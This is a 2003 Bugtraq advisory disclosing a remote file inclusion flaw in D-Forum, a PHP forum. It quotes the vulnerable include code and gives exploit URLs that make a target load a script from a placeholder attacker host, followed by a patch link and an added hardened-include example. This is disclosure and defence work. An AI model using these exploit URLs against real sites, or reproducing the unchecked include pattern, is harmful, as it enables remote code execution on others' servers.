[28923] in bugtraq


D-Forum (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)
Tue Feb 18 11:46:34 2003

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 16 Feb 2003 18:06:15 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F120SuOkx9rW2eUG3QG0000826b@hotmail.com>


Information :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
     include ($my_header);
} else {
     ?>
...
--------------------------


/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
     include ($my_footer);
} else {
?>
...
---------------------------



Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt 
or 
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt 
with
http://[attacker]/script.txt


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .

More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt




frog-m@n
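
A hardened form of the include in /includes/header.php3 (the same change applies to footer.php3), as an added example that is not part of the original advisory or of D-Forum's code. It assumes $my_header is populated from the request (for example through register_globals); the parameter name `header`, the `templates` directory and the file names are hypothetical.

```php
<?php
// Added example: allowlist-based replacement for include($my_header).
// File names and directory are hypothetical, not D-Forum's own.

// Permitted header keys mapped to fixed local files (constructed values).
const ALLOWED_HEADERS = [
    'default' => 'header_default.inc.php',
    'compact' => 'header_compact.inc.php',
];

/**
 * Resolve a requested header key to a local file path, or null when the
 * key is not on the allowlist. The caller's value is only ever used as an
 * array key, never as part of a path or URL.
 */
function resolve_header($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_HEADERS)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_HEADERS[$requested]);
    // Defence in depth: the resolved file must exist inside $baseDir.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Initialise the variable in the script itself so a request parameter of
// the same name cannot pre-populate it.
$my_header = null;
$choice    = $_GET['header'] ?? 'default';   // hypothetical parameter name
$my_header = resolve_header($choice, __DIR__ . '/templates');

if ($my_header !== null) {
    include $my_header;
} else {
    // Unknown key or missing file: fall back to the built-in header.
    echo "<!-- built-in default header -->\n";
}
```

Disabling remote URL includes in php.ini (allow_url_fopen on PHP 4, allow_url_include from PHP 5.2) blocks the http:// form of the value but not local paths, so the allowlist is still needed.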





